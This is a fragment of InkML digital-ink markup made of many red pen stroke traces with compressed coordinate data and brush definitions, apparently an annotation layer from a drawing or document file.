  <inkml:trace contextRef="#ctx0" brushRef="#br0">414 109 24575,'1132'0'-1554,"-604"0"-2588,-332 11 3254,-4 1 33,562-13 2629,-732 0-1240,-1-2 1,26-4 0,-24 2 387,37-1 1,-41 4-274,-1 0 0,20-6 0,-19 4-559,-1 1-1,22-1 1,28 3-90,-17 1 0,86-11 0,-88 5 0,0 3 0,77 4 0,46-3 0,-43-19 0,-81 12 0,-30 5 0,-1 0 0,31-1 0,8-5 0,-49 8 0,0 0 0,0 0 0,-1 0 0,1 1 0,0 0 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,7 1 0,-12 0 0,0-1 0,0 0 0,0 0 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 4 0,10 49 0,-8-36 0,4 45 0,-6-48 0,0-1 0,1 0 0,1 0 0,0 0 0,6 17 0,-3-15 0,-1 0 0,0 1 0,-2-1 0,0 1 0,1 23 0,-5 93 0,-1-53 0,3-45 0,9 46 0,-5-45 0,1 42 0,5 40 0,-6-79 0,1 45 0,-7-30-474,14 112-1,-7-119 475,-3 0 0,-3 66 0,1 36 0,21 10 0,-12-95 69,-6-37 371,3 48 0,-7-35-440,2-1 0,8 48 0,22 178 0,-22-199 0,-6-42 0,2 35 0,-3-31 0,6 35 0,-4-36 0,1 46 0,-6-8 0,-1-20 0,2 1 0,12 76 0,-7-70 0,-1 0 0,-3 0 0,-5 55 0,1-6 0,2 636 0,-1-712 0,-9 47 0,5-47 0,-1 45 0,7 7 0,-2 60 0,-10-79 0,7-44 0,1 1 0,-2 25 0,5 4 0,0-19 0,-1 0 0,-1 0 0,-7 33 0,5-32 0,3-21 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-5 9 0,5-13 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-4-1 0,-29-5 0,-64-3 0,45 6 0,-21-7 0,46 5 0,-44-1 0,29 6 0,-1-2 0,-42-8 0,21-2 0,0 3 0,-88-1 0,130 9 0,1-1 0,-35-8 0,7 1 0,-232-38 0,117 26-992,-32-5-308,54 7 588,56 10 728,-152-13-16,81 11 0,15 1 0,33 1-1,-155 8 0,121 3-490,-550-2 3972,672 2-3481,0 0 0,-1 2 0,1 0 0,1 2 0,-25 9 0,20-6 0,-1-2 0,-46 8 0,30-8 0,-82 24 0,33-6 0,-60 1 0,43-5 0,62-12 0,25-5 0,1 0 0,-32 1 0,-194-5-1365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8.272"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'4'0'0,"0"1"0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,5 5 0,6 8 0,18 31 0,-27-40 0,61 106 0,-52-89 0,-1 1 0,-1 1 0,-1-1 0,-1 2 0,7 37 0,-7-30 0,0 1 0,-2 0 0,-1 0 0,-2 1 0,0 53 0,-3-64 0,0 27 0,-2-49 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,-2 3 0,3-6 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1-2 0,-4-2 0,0-1 0,0 0 0,0 0 0,-5-9 0,-7-13-1365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8.656"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'1'0'0,"1"1"0,-1-1 0,-1 0 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 2 0,10 26 0,-8-22 0,38 120 0,4 10 0,-23-60 0,-1-2 0,-7-30 0,-11-32 0,0-1 0,10 22 0,-5-18 0,1 0 0,0-1 0,11 15 0,-12-17-1365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29.001"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">23 153 24575,'3'0'0,"6"0"0,4 3 0,4 2 0,3 0 0,1 2 0,1 1 0,1-2 0,0-1 0,-1-2 0,0-2 0,1 0 0,-5-4 0,-5-6 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1">0 1 24575,'0'4'0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3.178"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">23 0 24575,'-1'85'0,"3"92"0,8-104 0,-5-45 0,1 48 0,7 133-748,-1-29-244,-2-26 194,1 301-1525,-13-280 1776,2 1339 3287,0-699-72,1-785-2821,9 46 1,-5-44 18,1 33-1,-5 17 135,-1-17 0,11 86 0,-1-44 0,2 14 0,-7-88 0,-2-1 0,-1 1 0,-4 64 0,2-96 4,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,0 0-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 0 0,0 0-1,0 0 1,-1 1 0,1-2 2,1 1 1,-1-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,1 0-1,-1 0 1,0-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1-1 1,-1 1-1,0 0 1,0-2-1,-6-5 73,0 0 0,1-1 0,-10-14 0,9 12-54,-1 0-25,0 0 0,1-1 0,1 0 0,0 0 0,0 0 0,1-1 0,1 0 0,0 0 0,0 0 0,-1-16 0,-2-15 0,1 14 0,-1-52 0,7-106-2391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4.013"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 111 24575,'28'-10'0,"-10"2"0,-8 5 0,32-10 0,1 2 0,59-9 0,77 6-117,-111 8-191,113 5-1,11-1 342,-105-8-33,29-1 0,791 9-3609,-442 4 472,-236-4 2574,245 5-972,-187 18 1632,-204-15 271,217 10 1169,81-17 3093,-371 1-4273,-1-1 0,0 0 0,0 0 0,0-1 0,0-1 0,-1 1 0,16-8 0,-24 10-355,1 0-1,0 0 1,-1-1-1,1 1 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0 0,1 1-1,0-1 1,-1 0-1,1 0 1,0 1-1,-1-1 1,1 0-1,-1 1 1,1-1 0,0 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1 0,1 0-1,-1-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 1-1,10 37-10,-6-22 13,33 89 51,-3-12-687,-9-3-70,20 140 0,15 77 702,-40-216-1154,7 109-1,-6-36 203,2-5 118,21 121 891,-5 3-57,-25-159 0,0 3 0,23 148 0,-14-62 0,-3-21 0,0-70-60,103 522-773,22 73 213,-105-397-405,66 185 1001,-33-177 11,-8-63 5522,-57-242-4480,0 0-1,17 33 0,-25-56-1028,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-2 1 0,-48 17 0,39-15 0,-20 10-1365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4.418"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 491 24575,'46'17'0,"-3"-12"0,1-1 0,83-6 0,-38 0 0,367 2 0,-428-1 9,43-9-1,15 0-201,369 10-2548,-364 8 1470,160 37 0,-155-24 12,123 10 1,-95-23 1055,370 35-1551,-121 1 1290,481-5-1,-728-38 851,112-3 1217,-198-3-1292,0-1 0,59-17 0,8-1 130,-90 20 439,0-1 1,0-1 0,-1-1-1,24-12 1,11-5 954,-49 24-1789,0-1 0,0 0 0,0 0 1,0 1-1,0-2 0,0 1 1,0 0-1,0 0 0,-1 0 0,1-1 1,0 1-1,-1-1 0,1 1 0,-1-1 1,0 0-1,1 0 0,-1 0 0,0 1 1,0-1-1,0 0 0,-1 0 0,1 0 1,0-3-1,-1 2-38,0 1-1,0-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,0 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,0-1 1,-1 1-1,0 0 1,1 1 0,-1-1-1,0 0 1,-3-2-1,-16-17-7,0-1 0,2-1 0,1 0 0,0-1 0,-24-47 0,25 46-179,0 0 0,-38-38 0,30 35-21,-26-36 1,-39-70-1011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5.213"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'25'28'38,"-2"1"-1,36 58 0,-1-3-1787,-39-56 1281,25 51 0,-23-41 399,-6-13 70,32 37 0,-1 0 0,36 42-32,-61-79 7,0 0 1,-2 1-1,31 54 1,-30-45 225,1-2 1,1 0-1,42 45 0,-50-61 532,0-3-368,0 0 0,30 22 0,14 14-222,-51-43-143,-1 1 0,1 0 0,-1 0 0,0 0 0,-1 1 0,0 0 0,4 12 0,6 9 0,1-1 0,1 0 0,23 28 0,-39-55 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,2 0 0,-2 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,3-8 0,-1-1 0,0 1 0,4-21 0,-4 13 0,4-9 0,11-54 0,-11 46 0,1 1 0,14-37 0,-8 28 0,-6 17 0,19-68 0,-22 74 0,2 0 0,0 1 0,15-31 0,-11 29 0,-2-1 0,9-30 0,-13 32 0,1 1 0,0-1 0,2 1 0,0 0 0,1 0 0,1 1 0,1 1 0,18-24 0,-26 37-105,2 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,6-2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5.542"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'9'0,"0"1"0,1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,10 16 0,-7-11 0,-1 0 0,8 21 0,-6-14 0,0 0 0,1-1 0,13 20 0,6 11 0,10 17 0,-25-47 0,-1 1 0,16 38 0,-22-44 0,-4-11 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 5 0,-1-8 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,-7-1-46,1 0 0,-1-1-1,1 0 1,-1-1 0,1 1-1,0-1 1,0-1 0,1 0-1,-15-9 1,8 6-856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5.954"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'19'0,"1"0"0,0-1 0,1 1 0,1-1 0,1 0 0,1-1 0,12 24 0,7 22 0,0-15 134,-6-13-1633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6.376"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'1'1'0,"0"-1"0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,11 28 0,-10-23 0,34 118 0,48 115 0,-81-234 0,0 0 0,0 0 0,0-1 0,1 1 0,0-1 0,0 0 0,0 0 0,1-1 0,-1 1 0,8 4 0,54 37 0,103 38 0,-163-81 0,53 21-1365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6.598"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">369 0 24575,'0'42'0,"2"-11"0,-3 0 0,0 0 0,-12 61 0,8-73 0,-7 29 0,-28 76 0,26-86 0,-14 68 0,9-32 0,-1-4-519,5-23 506,-16 92 0,26-116 13,0-1 0,-1 1 0,-2-1 0,-14 32 0,-10 27 0,-11 93 545,29-89-545,6-28 0,4-27 0,1-1 0,2 35 0,-20-185 0,22 92 0,1-1 0,1 1 0,1-1 0,2 1 0,1 0 0,1 1 0,14-32 0,10-7 0,-10 26 0,27-48-1365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6.729"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 2 24575,'4'0'0,"31"-1"0,0 1 0,0 2 0,0 1 0,0 2 0,48 14 0,213 66 0,-101-42 0,-183-40 0,20 3 0,0-2 0,1-1 0,35-1 0,-27-2 0,49 8 0,13 2-1363,210-5-1,-167-7 816,831 2 1247,-950-2-51,43-7-1,-46 5-293,0 0 0,42 1 1,-58 3-340,-1 1 1,0 0-1,1 0 1,-1 0 0,0 1-1,0 1 1,0-1 0,0 1-1,-1 0 1,1 0-1,-1 1 1,0 0 0,9 6-1,-6-2-185,2 0-1,-1-1 0,1 0 1,0-1-1,0 0 0,1-1 1,18 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7.266"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">555 6 24575,'0'-1'0,"0"1"0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,24 6 0,-10-1 0,0 1 0,26 15 0,19 7 0,-34-20 0,-1 2 0,0 1 0,-1 1 0,-1 1 0,0 1 0,0 1 0,21 19 0,-11-7 0,-1 0 0,0 2 0,44 51 0,-68-69 0,0 0 0,0 0 0,-2 0 0,1 1 0,-1 0 0,-1 1 0,0-1 0,-1 1 0,0 0 0,-1 0 0,0 0 0,1 21 0,-3-19 0,0 0 0,-1 1 0,-1-1 0,0 0 0,-1 0 0,0 0 0,-2 0 0,0 0 0,0-1 0,-1 0 0,-9 19 0,3-15 0,-1 0 0,-1-1 0,-28 30 0,-53 44 0,67-66 0,-49 42 0,40-38 0,1 3 0,1 1 0,-49 64 0,65-71 0,12-16 0,-1 1 0,0-1 0,-1-1 0,0 1 0,-11 8 0,11-10 0,1 0 0,0 1 0,0-1 0,0 2 0,1-1 0,1 1 0,-7 15 0,5-11 0,0 0 0,-1-1 0,-11 14 0,-15 9 0,-1-1 0,-2-1 0,-42 28 0,-3 3 0,23-19-925,-130 76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8.307"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3008 2 24575,'-92'-2'0,"-100"5"0,130 7 0,-11 1 0,-398-8-4201,241-5 2782,-1100 2-2783,1275 3 4397,0 2 0,-83 20 1,-26 3 120,152-27 479,-1 0-1,1 1 1,0 0-1,-1 1 1,2 1-1,-1-1 1,0 2-1,1 0 1,-1 0-1,-14 11 1,27-25-1980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8.780"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">914 0 24575,'-8'2'0,"-1"0"0,0 0 0,1 1 0,-1 0 0,1 0 0,0 1 0,0 0 0,0 0 0,0 1 0,-12 10 0,-16 8 0,-4 0-11,0 1-31,-1-2 0,-70 26 0,85-37-113,0 0 0,1 1 0,-40 27 0,20-11 88,25-16 185,0 1 0,1 1-1,1 1 1,0 0 0,1 1 0,-23 29-1,20-22-117,-27 23 0,29-30 0,2 1 0,-24 30 0,34-39 0,2-1 0,-1 1 0,1 0 0,0 0 0,1 1 0,0-1 0,0 1 0,1 0 0,0-1 0,-1 16 0,0 25 0,-7 56 0,6-81 0,1 1 0,1-1 0,1 1 0,1 0 0,1 0 0,2-1 0,0 1 0,2-1 0,0 0 0,2 0 0,0 0 0,20 38 0,-14-33 0,1-2 0,1 1 0,2-2 0,0-1 0,24 26 0,-40-50 0,14 16 0,0-1 0,33 25 0,-30-30 0,33 17 0,-7-6 0,-21-11 0,0 0 0,34 9 0,4 2 0,-27-7 0,1-2 0,1-2 0,69 13 0,-59-15 0,17 1 0,-25-5-1365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39.979"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'4'0'0,"27"-1"0,0 1 0,0 2 0,0 1 0,0 1 0,0 2 0,33 10 0,-34-7 0,2-1 0,46 5 0,6 2 0,-30-2 0,53 9 0,-8-2-213,-68-13-372,61 7 0,89 9-681,-35-3 354,133 20-1369,73 5-927,-89-27 3203,348 11 169,-531-28-54,76-3 343,-145 1 462,-1 0 0,1-1 1,-1 0-1,0-1 0,0 0 0,17-8 1,-27 11-882,1 0 1,-1 0-1,0 0 0,1 0 1,-1 0-1,0-1 0,0 1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1-1 1,-1 1-1,0 0 0,0 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0-1 0,-1 1 1,-13-11 398,-22-2-423,9 8-10,-37-4 0,-17-2 0,76 10-43,-32-7-398,0 1 1,-57-3-1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18.055"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3253 1 24575,'-30'-1'0,"0"2"0,0 1 0,0 2 0,0 0 0,1 2 0,-45 16 0,-15 2-523,66-19 253,1 1 1,0 1 0,-26 11 0,-89 43-110,-39 19-180,35-13 559,57-29 0,6-1 0,-258 137 0,60-26 0,227-124 0,6-1 0,-60 45 0,-1 1 0,80-53 0,0 0 0,-21 22 0,26-22 0,-1 0 0,0-1 0,-29 16 0,28-21 0,1 1 0,0 0 0,1 2 0,0 0 0,1 2 0,0 0 0,1 1 0,1 0 0,-16 21 0,17-20 0,0 0 0,-2-2 0,1 0 0,-32 21 0,7-4 0,39-31 0,-45 36 0,-82 85 0,35-23 0,-45 54 0,136-149 3,-13 17 239,0 0 1,1 0-1,1 2 1,1-1-1,-9 27 1,15-31-89,-1 1 1,0-1-1,-1 0 0,-1-1 1,0 0-1,-17 19 0,26-35-154,0 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,-2-2 0,-40-30 0,43 32 0,-3-2-124,1-1 0,0 1 0,-1-1 0,1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-2-8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18.841"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'7'0,"1"1"0,0-1 0,0 1 0,1-1 0,0 0 0,0 0 0,0-1 0,1 1 0,0-1 0,1 1 0,0-1 0,9 9 0,14 22 0,-15-12 0,-1-1 0,-1 1 0,14 46 0,-4-10 0,25 111 0,-44-164 0,1 11 0,-1-1 0,0 35 0,-2-41 0,-1 0 0,2 0 0,0 1 0,1-1 0,0 0 0,0 0 0,1 0 0,9 20 0,64 136 0,-71-156 0,11 28 0,-5-11 0,2 0 0,1 0 0,19 29 0,-29-51 0,0 0 0,-1 1 0,0-1 0,0 1 0,-1-1 0,0 1 0,0 0 0,1 11 0,-3-12 0,2 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,1 1 0,0-1 0,6 10 0,-7-15 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,4 0 0,8-1 0,-1-1 0,1-1 0,15-4 0,10-2 0,15 4-345,79 5-1,-58 1 173,-34 1-116,42 8-1,22 1-578,54 2 571,-60-4 305,58 12 47,-96-11-605,87 3-1,333-14 970,-470 1-148,0 2-1,1-1 1,-1 2-1,13 4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47.701"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">309 3 24575,'-54'-1'0,"25"0"0,-1 1 0,1 1 0,0 1 0,0 2 0,-37 9 0,64-13 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 3 0,1-2 0,-1 1 0,2 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,2 7 0,0 0 0,1 0 0,1 0 0,0-1 0,0 1 0,1-1 0,1 0 0,7 11 0,77 93 0,-15-39 0,-46-47 0,-22-23 0,0 2 0,-1-1 0,11 13 0,2 8 0,0 0 0,-1 0 0,19 38 0,-13-16 0,-3 2 0,-2 1 0,-3 0 0,20 104 0,-26-102 0,-6-37 0,-1-1 0,-1 1 0,0-1 0,-1 1 0,-1 20 0,-1-34 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 1 0,-6 2 0,-8 2 0,0 0 0,0-1 0,-24 4 0,11-3 0,2 0 0,-1-2 0,0-1 0,-1-1 0,1-1 0,-44-5 0,71 4 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1-2 0,0-9 0,0 0 0,0 0 0,2 0 0,1-15 0,-1 4 0,2 2 0,0-1 0,1 1 0,13-38 0,2-10 0,3-19 0,-22 87 0,1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,4-1 0,9 0 0,0 0 0,0 1 0,24 3 0,-10-1 0,-11-2 0,1 0 0,0-2 0,0 0 0,20-6 0,3 3-56,19-4 211,-58 8-267,-1 0-1,1 0 0,0 0 1,-1-1-1,1 0 1,-1 1-1,0-1 0,1 0 1,-1-1-1,0 1 0,0 0 1,4-6-1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48.126"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 301 24575,'1'0'0,"0"0"0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 2 0,14 24 0,-6-9 0,-4-12 0,0 1 0,1-1 0,0 0 0,0-1 0,1 1 0,-1-1 0,1 0 0,0-1 0,0 0 0,1 0 0,-1 0 0,14 4 0,-17-7 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,5-5 0,-1 0 0,-1-1 0,0 0 0,-1 0 0,1 0 0,-2-1 0,1 0 0,-1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1-14 0,4-25 0,-1 8 0,2-63 0,-8 95-118,0 3-131,0-1-1,-1 0 1,1 0-1,-4-11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48.981"/>
